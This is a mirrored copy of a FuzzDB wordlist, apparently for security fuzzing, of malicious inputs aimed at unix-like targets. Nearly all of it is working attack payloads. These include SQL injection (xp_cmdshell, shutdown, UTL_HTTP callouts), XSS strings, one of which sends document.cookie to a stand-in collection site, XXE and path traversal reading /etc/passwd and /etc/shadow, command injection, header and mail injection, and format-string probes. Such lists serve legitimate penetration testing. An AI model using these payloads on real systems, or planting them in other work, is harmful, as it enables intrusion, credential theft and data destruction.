mirror of
https://github.com/fuzzdb-project/fuzzdb.git
synced 2024-12-02 15:59:09 +00:00
512 lines
13 KiB
Text
512 lines
13 KiB
Text
# a wide sample of malicious input for unix-like targets
|
|
!
|
|
!'
|
|
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
|
!@#0%^#0##018387@#0^^**(()
|
|
"
|
|
" or "a"="a
|
|
" or "x"="x
|
|
" or 0=0 #
|
|
" or 0=0 --
|
|
" or 1=1 or ""="
|
|
" or 1=1--
|
|
"' or 1 --'"
|
|
") or ("a"="a
|
|
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
|
|
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
|
|
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
|
|
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
|
|
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
|
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
|
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
|
"><script>"
|
|
"><script>alert(1)</script>
|
|
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
|
|
">xxx<P>yyy
|
|
"\t"
|
|
#
|
|
#'
|
|
#'
|
|
#xA
|
|
#xA#xD
|
|
#xD
|
|
#xD#xA
|
|
$NULL
|
|
$null
|
|
%
|
|
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
|
%00
|
|
%00../../../../../../etc/passwd
|
|
%00../../../../../../etc/shadow
|
|
%00/
|
|
%00/etc/passwd%00
|
|
%01%02%03%04%0a%0d%0aADSF
|
|
%08x
|
|
%0A/usr/bin/id
|
|
%0A/usr/bin/id%0A
|
|
%0Aid
|
|
%0Aid%0A
|
|
%0a ping -i 30 127.0.0.1 %0a
|
|
%oa ping -n 30 127.0.0.1 %0a
|
|
%0a id %0a
|
|
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
|
|
%0d
|
|
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
|
|
%0d%0aX-Injection-Header:%20AttackValue
|
|
%20
|
|
%20$(sleep%2050)
|
|
%20'sleep%2050'
|
|
%20d
|
|
%20n
|
|
%20s
|
|
%20x
|
|
%20|
|
|
%21
|
|
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
|
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
|
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
|
%2500
|
|
%250a
|
|
%26
|
|
%27%20or%201=1
|
|
%28
|
|
%29
|
|
%2A
|
|
%2A%28%7C%28mail%3D%2A%29%29
|
|
%2A%28%7C%28objectclass%3D%2A%29%29
|
|
%2A%7C
|
|
%2C
|
|
%2e%2e%2f
|
|
%3C
|
|
%3C%3F
|
|
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
|
|
%3cscript%3ealert("XSS");%3c/script%3e
|
|
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
|
|
%5C
|
|
%5C/
|
|
%60
|
|
%7C
|
|
%7f
|
|
%99999999999s
|
|
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
|
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
|
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
|
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
|
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
|
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
|
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
|
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
|
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
|
%ff
|
|
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
|
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
|
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
|
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
|
%s%p%x%d
|
|
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
|
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
|
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
|
&
|
|
& id
|
|
& ping -i 30 127.0.0.1 &
|
|
& ping -n 30 127.0.0.1 &
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
|
|
|
|
|
|
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
<
|
|
'
|
|
'%20OR
|
|
&id
|
|
<
|
|
<
|
|
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
|
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
|
<!--#exec%20cmd="/usr/bin/id;-->
|
|
<>"'%;)(&+
|
|
<script>alert(document.cookie);<script>alert
|
|
<script>alert(document.cookie);</script>
|
|
";id"
|
|
'
|
|
' (select top 1
|
|
' --
|
|
' ;
|
|
' UNION ALL SELECT
|
|
' UNION SELECT
|
|
' or ''='
|
|
' or '1'='1
|
|
' or '1'='1'--
|
|
' or 'x'='x
|
|
' or (EXISTS)
|
|
' or 0=0 #
|
|
' or 0=0 --
|
|
' or 1 in (@@version)--
|
|
' or 1=1 or ''='
|
|
' or 1=1--
|
|
' or a=a--
|
|
' or uid like '%
|
|
' or uname like '%
|
|
' or user like '%
|
|
' or userid like '%
|
|
' or username like '%
|
|
'%20or%201=1
|
|
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
|
|
'';!--"<XSS>=&{()}
|
|
') or ('a'='a
|
|
'--
|
|
'; exec master..xp_cmdshell
|
|
'; exec xp_regread
|
|
'; waitfor delay '0:30:0'--
|
|
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
|
|
';shutdown--
|
|
'><script>alert(document.cookie);</script>
|
|
'><script>alert(document.cookie)</script>
|
|
'hi' or 'x'='x';
|
|
'or select *
|
|
'sqlattempt1
|
|
'||UTL_HTTP.REQUEST
|
|
'||Utl_Http.request('http://<yourservername>') from dual--
|
|
(
|
|
(')
|
|
(sqlattempt2)
|
|
)
|
|
))))))))))
|
|
*
|
|
*'
|
|
*'
|
|
*(|(mail=*))
|
|
*(|(objectclass=*))
|
|
*/*
|
|
*|
|
|
+
|
|
+%00
|
|
,@variable
|
|
-
|
|
--
|
|
--';
|
|
--sp_password
|
|
-1
|
|
-1.0
|
|
-2
|
|
-20
|
|
-268435455
|
|
..%%35%63
|
|
..%%35c
|
|
..%25%35%63
|
|
..%255c
|
|
..%5c
|
|
..%bg%qf
|
|
..%c0%af
|
|
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
|
..%u2215
|
|
..%u2216
|
|
../
|
|
../../../../../../../../../../../../etc/hosts
|
|
../../../../../../../../../../../../etc/hosts%00
|
|
../../../../../../../../../../../../etc/passwd
|
|
../../../../../../../../../../../../etc/passwd%00
|
|
../../../../../../../../../../../../etc/shadow
|
|
../../../../../../../../../../../../etc/shadow%00
|
|
..\
|
|
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
|
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
|
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
|
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
|
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
|
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
|
/
|
|
/%00/
|
|
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
|
/%2A
|
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
|
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
|
/'
|
|
/'
|
|
/,%ENV,/
|
|
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
|
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
|
/.../.../.../.../.../
|
|
/../../../../../../../../%2A
|
|
/../../../../../../../../../../../etc/passwd%00.html
|
|
/../../../../../../../../../../../etc/passwd%00.jpg
|
|
/../../../../../../../../../../etc/passwd
|
|
/../../../../../../../../../../etc/passwd^^
|
|
/../../../../../../../../../../etc/shadow
|
|
/../../../../../../../../../../etc/shadow^^
|
|
/../../../../../../../../bin/id|
|
|
/..\../..\../..\../..\../..\../..\../boot.ini
|
|
/..\../..\../..\../..\../..\../..\../etc/passwd
|
|
/..\../..\../..\../..\../..\../..\../etc/shadow
|
|
/./././././././././././etc/passwd
|
|
/./././././././././././etc/shadow
|
|
//
|
|
//*
|
|
/etc/passwd
|
|
/etc/shadow
|
|
/index.html|id|
|
|
0
|
|
0 or 1=1
|
|
00
|
|
0xfffffff
|
|
1
|
|
1 or 1 in (@@version)--
|
|
1 or 1=1--
|
|
1.0
|
|
1; waitfor delay '0:30:0'--
|
|
1;SELECT%20*
|
|
1||Utl_Http.request('http://<yourservername>') from dual--
|
|
2
|
|
2147483647
|
|
268435455
|
|
65536
|
|
:response.write 111111
|
|
;
|
|
; ping 127.0.0.1 ;
|
|
;/usr/bin/id\n
|
|
;echo 111111
|
|
;id
|
|
;id;
|
|
;id\n
|
|
;id|
|
|
;ls -la
|
|
;system('/usr/bin/id')
|
|
;system('cat%20/etc/passwd')
|
|
;system('id')
|
|
;|/usr/bin/id|
|
|
<
|
|
< script > < / script>
|
|
<!
|
|
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
|
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
|
</foo>
|
|
<<
|
|
<<<
|
|
<<script>alert("XSS");//<</script>
|
|
<>"'%;)(&+
|
|
<?
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
|
|
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
|
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
|
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
|
<IMG DYNSRC="javascript:alert('XSS')">
|
|
<IMG LOWSRC="javascript:alert('XSS')">
|
|
<IMG SRC="  javascript:alert('XSS');">
|
|
<IMG SRC="jav ascript:alert('XSS');">
|
|
<IMG SRC="jav	ascript:alert('XSS');">
|
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|
<IMG SRC="jav
ascript:alert('XSS');">
|
|
<IMG SRC="javascript:alert('XSS')"
|
|
<IMG SRC="javascript:alert('XSS');">
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
|
<IMG SRC=`javascript:alert("'XSS'")`>
|
|
<IMG SRC=javascript:alert("XSS")>
|
|
<IMG SRC=javascript:alert('XSS')>
|
|
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
|
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
|
|
<IMG%20SRC='javasc ript:alert(document.cookie)'>
|
|
<IMG%20SRC='javascript:alert(document.cookie)'>
|
|
<foo></foo>
|
|
<name>','')); phpinfo(); exit;/*</name>
|
|
<script>alert("XSS")</script>
|
|
<script>alert(document.cookie)</script>
|
|
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
|
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
|
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
|
<xss><script>alert('XSS')</script></vulnerable>
|
|
<youremail>%0aBcc:<youremail>
|
|
<youremail>%0aCc:<youremail>
|
|
<youremail>%0d%0aBcc:<youremail>
|
|
<youremail>%0d%0aCc:<youremail>
|
|
=
|
|
='
|
|
=--
|
|
=;
|
|
>
|
|
?x=
|
|
?x="
|
|
?x=>
|
|
?x=|
|
|
@'
|
|
@'
|
|
@*
|
|
@variable
|
|
A
|
|
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
|
FALSE
|
|
NULL
|
|
PRINT
|
|
PRINT @@variable
|
|
TRUE
|
|
XXXXX.%p
|
|
XXXXX`perl -e 'print ".%p" x 80'`
|
|
[']
|
|
[']
|
|
\
|
|
\";alert('XSS');//
|
|
\"blah
|
|
\'
|
|
\'
|
|
\..\..\..\..\..\..\..\..\..\..\etc\passwd
|
|
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
|
\..\..\..\..\..\..\..\..\..\..\etc\shadow
|
|
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
|
\0
|
|
\00
|
|
\00\00
|
|
\00\00\00
|
|
\0\0
|
|
\0\0\0
|
|
\\
|
|
\\'/bin/cat%20/etc/passwd\\'
|
|
\\'/bin/cat%20/etc/shadow\\'
|
|
\\/
|
|
\\\\*
|
|
\\\\?\\
|
|
\n/bin/ls -al\n
|
|
\n/usr/bin/id;
|
|
\n/usr/bin/id\n
|
|
\n/usr/bin/id|
|
|
\nid;
|
|
\nid\n
|
|
\nid|
|
|
\nnetstat -a%\n
|
|
\t
|
|
\u003C
|
|
\u003c
|
|
\x23
|
|
\x27
|
|
\x27UNION SELECT
|
|
\x27\x4F\x52 SELECT *
|
|
\x27\x6F\x72 SELECT *
|
|
\x3C
|
|
\x3D \x27
|
|
\x3D \x3B'
|
|
\x3c
|
|
^'
|
|
^'
|
|
`
|
|
`/usr/bin/id`
|
|
`dir`
|
|
`id`
|
|
`perl -e 'print ".%p" x 80'`%n
|
|
`ping 127.0.0.1`
|
|
a);/usr/bin/id
|
|
a);/usr/bin/id;
|
|
a);/usr/bin/id|
|
|
a);id
|
|
a);id;
|
|
a);id|
|
|
a)|/usr/bin/id
|
|
a)|/usr/bin/id;
|
|
a)|id
|
|
a)|id;
|
|
a;/usr/bin/id
|
|
a;/usr/bin/id;
|
|
a;/usr/bin/id|
|
|
a;id
|
|
a;id;
|
|
a;id|
|
|
http://<yourservername>/
|
|
id%00
|
|
id%00|
|
|
insert
|
|
like
|
|
limit
|
|
null
|
|
or
|
|
or 0=0 #
|
|
or 0=0 --
|
|
or 1=1--
|
|
or%201=1
|
|
or%201=1 --
|
|
response.write 111111
|
|
something%00html
|
|
update
|
|
x' or 1=1 or 'x'='y
|
|
x' or name()='username' or 'x'='y
|
|
xsstest
|
|
xsstest%00"<>'
|
|
{'}
|
|
|/usr/bin/id
|
|
|/usr/bin/id|
|
|
|id
|
|
|id;
|
|
|id|
|
|
|ls
|
|
|ls -la
|
|
|nid\n
|
|
|usr/bin/id\n
|
|
||
|
|
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
|
|
||/usr/bin/id;
|
|
||/usr/bin/id|
|
|
}
|